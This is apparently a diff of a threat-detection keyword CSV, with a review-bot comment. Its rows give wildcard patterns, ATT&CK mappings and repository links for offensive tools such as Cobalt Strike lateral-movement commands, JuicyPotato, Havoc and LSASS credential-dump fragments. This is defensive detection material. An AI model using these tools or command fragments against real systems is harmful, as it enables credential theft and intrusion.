T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*jpillora/chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*jquery-c2.*.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*js-cracker-client/cracker.js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*JScriptStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*jtee43gt-6543-2iur-9422-83r5w27hgzaq*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*juicycreds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*juicycreds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*JuicyPotato.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*JuicyPotato.exe*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*JuicyPotato.sln*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*JuicyPotato.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*juicypotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*juicypotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*JuicyPotato.sln*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*JuicyPotato.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*juicypotato_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*JuicyPotatoNG.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.exe*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" 
@@ -12593,14 +12749,14 @@ "*jump psexec64*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*jump-exec psexec *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control 
framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*jump-exec psexec *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*jump-exec scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*JunctionFolder.exe*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*--just-clean*cleaning/to_clean.txt*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*JunctionFolder.exe*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*--just-clean*cleaning/to_clean.txt*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*jweny/zabbix-saml-bypass-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" -"*jwt_tool*","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4461","600","2023-06-26T14:55:14Z","2017-01-23T21:13:50Z" +"*jwt_tool*","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. 
scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4465","600","2023-06-26T14:55:14Z","2017-01-23T21:13:50Z" "*-K lsass_loot*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*-k -no-pass -p '' --auth-method kerberos*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*-k -no-pass -p '' --auth-method kerberos*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*k4yt3x/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*K8_CS_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click 
deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*k8gege.org/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" 
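Review bot: The rewritten `*jump-exec psexec *` row for havoc still carries sub-technique IDs written with a hyphen (`T1573-001`, `T1059-003`, `T1574-001`), while the neighbouring cobaltstrike rows in this hunk use the dotted ATT&CK form (`T1573.001`). The field is itself delimited with ` - `, so a consumer that splits on the separator and looks the IDs up against ATT&CK will probably fail to map them, and the detection loses its technique context. Since the line is already being rewritten for the star and fork counts, normalise it to the dotted form, e.g. `T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1027 - T1071.001`. It is also worth confirming that `T1573-003` through `T1573-005` correspond to real sub-techniques before keeping them.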
@@ -12623,18 +12779,18 @@ "*kali-linux-*-raspberry-pi-armhf.img.xz*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*kali-linux-*-virtualbox-amd64.ova*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*kali-linux-*-vmware-amd64.7z*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*kalitorify*","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). 
